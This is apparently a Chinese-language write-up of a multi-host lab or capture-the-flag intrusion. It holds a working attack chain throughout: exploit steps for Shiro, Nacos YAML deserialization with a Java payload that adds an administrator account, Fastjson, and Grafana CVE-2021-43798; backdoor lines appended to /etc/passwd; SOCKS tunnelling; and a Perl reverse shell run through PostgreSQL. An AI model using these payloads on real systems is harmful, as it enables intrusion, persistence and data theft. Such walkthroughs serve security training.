第一扫靶机ip端口扫出一个8080端口。
然后发现是Actuator Leak
我们直接用工具heapdump分析即可
java -jar heapdump_tool.jar heapdump
然后那道shirokey: GAYysgMQhG7/CzIJlVpR2g==
然后用shiro的UI利用工具一把梭哈就可以了
打个内存马,然后弹shell上线。
python3 -c 'import pty; pty.spawn("/bin/bash")'
先来个交互式shell,找找suid:
find / -user root -perm -4000 -print 2>/dev/nul
发现vim.basic有suid权限
这里其实可以vim.basic写公钥进行root提权的,如果写成功了,后续的操作也会很方便。
但是这样的shell环境和屎没有区别,我就不写了。
vim.basic /root/.ssh/authorized_keys
flag1
vim.basic /root/flag/flag01.txt
然后上传fscan到靶机上
$ ifconfig
$ chmod +x fscan
$ ./fscan -h 172.30.12.5/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.30.12.5 is alive
(icmp) Target 172.30.12.6 is alive
(icmp) Target 172.30.12.236 is alive
[*] Icmp alive hosts len is: 3
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo
[*]172.30.12.6
[->]Server02
[->]172.30.12.6
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=A6EB92F10BCF56BE0C344E22A075FA3D
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=A6EB92F10BCF56BE0C344E22A075FA3D code:200 len:2005 title:医疗管理后台
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file
已完成 7/9 [-] ssh 172.30.12.5:22 root root123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 7/9 [-] ssh 172.30.12.5:22 root a123456. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 7/9 [-] ssh 172.30.12.236:22 root sa123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no suppor
扫到三个C段,然后我们一个一个来,先打Nacos老熟人。
我们开始搭建隧道:
vps段:
./linux_x64_admin -l 8000 -s 123
客户端:
./linux_x64_agent -c vps_sever:8000 -s 123
vps端:
use 0
socks 8000 admin admin
本地配置一下socket5,然后默认弱密码先进后台Nacos/nacos
工具NacosExploitGUI来探测。
发现可以打yaml反序列化。之前扫出来版本是windows工作组。
注意:
这个用户注册用户名字和用户密码不能有相关性,并且密码尽可能复杂一点
package artsploit;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
public AwesomeScriptEngineFactory() {
try {
Runtime.getRuntime().exec("net user harder qwer@1234! /add");
Runtime.getRuntime().exec("net localgroup administrators harder /add");
} catch (IOException e) {
e.printStackTrace();
}
}
@Override
public String getEngineName() {
return null;
}
@Override
public String getEngineVersion() {
return null;
}
@Override
public List<String> getExtensions() {
return null;
}
@Override
public List<String> getMimeTypes() {
return null;
}
@Override
public List<String> getNames() {
return null;
}
@Override
public String getLanguageName() {
return null;
}
@Override
public String getLanguageVersion() {
return null;
}
@Override
public Object getParameter(String key) {
return null;
}
@Override
public String getMethodCallSyntax(String obj, String m, String... args) {
return null;
}
@Override
public String getOutputStatement(String toDisplay) {
return null;
}
@Override
public String getProgram(String... statements) {
return null;
}
@Override
public ScriptEngine getScriptEngine() {
return null;
}
}
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf harder.jar -C src/ .
我们把harder.jar包放到内网的一个目录下,开启一个服务
python3 -m http.server 2356
我们可以直接添加用户,然后远程rdp连接即可
flag2
然后打开个人电脑打开记事本就拿到flag
然后接一下信息收集一下,没什么有用的东西,我们继续打另外一个靶机。admin,admin登录发现是json数据,直接上插件FastjsonExp扫一下就OK了
注入哥斯拉的内存马,连接即可。然后在这发现是root,先拿flag
flag3
维持一下权限,在哥斯拉里面直接添加用户:
$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash
用户: hacker 密码: 123456
我们也可以用命令添加用户:
echo 'hack:zSZ7Whrr8hgwY:0:0::/root/:/etc/bash' >>/etc/passwd
在web3中,我们ifconfig发现是双网卡,然后进行fscan扫一下B段
找到靶机另外一个B段靶机,现在开始搭建二级隧道(在一级隧道的基础上搭建)
./linux_x64_agent -c 172.30.12.5:7711 -s 123 --reconnect 8
在靶机172.30.12.5上:
use 0
listen
1
7711
然后就会有节点1添加,然后:
use 1
socks 7701 admin admin
二级隧道搭建完成
fscan扫描内网发现一个新的B段,我们尝试那下这台机器,弱密码直接登录,搜索发现有CVE-2021-43798,可以使用工具获取敏感信息,也可以自己读
自己手搓:
工具:
proxychains -f /etc/proxychains4.conf ./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
拿到Postgres的用户和账号postgres:Postgres@123
登录数据库:
proxychains -f /etc/proxychains4.conf psql -h 172.30.54.12 -U postgres -W
反弹shell到靶机3上
select system('perl -e \'use Socket;$i="172.30.12.236";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
然后就是提权操作读flag:
postgres@web04:/usr/local/pgsql/data$ sudo /usr/local/postgresql/bin/psql
sudo /usr/local/postgresql/bin/psql
Password: 123456
Welcome to psql 8.1.0, the PostgreSQL interactive terminal.
Type: \copyright for distribution terms
\h for help with SQL commands
\? for help with psql commands
\g or terminate with semicolon to execute query
\q to quit
root=# \?
Input/Output
--More--!/bin/bash
root@web04:/usr/local/pgsql/data# whoami
root
flag4
这里没截图,用下其他师傅的截图吧(buish
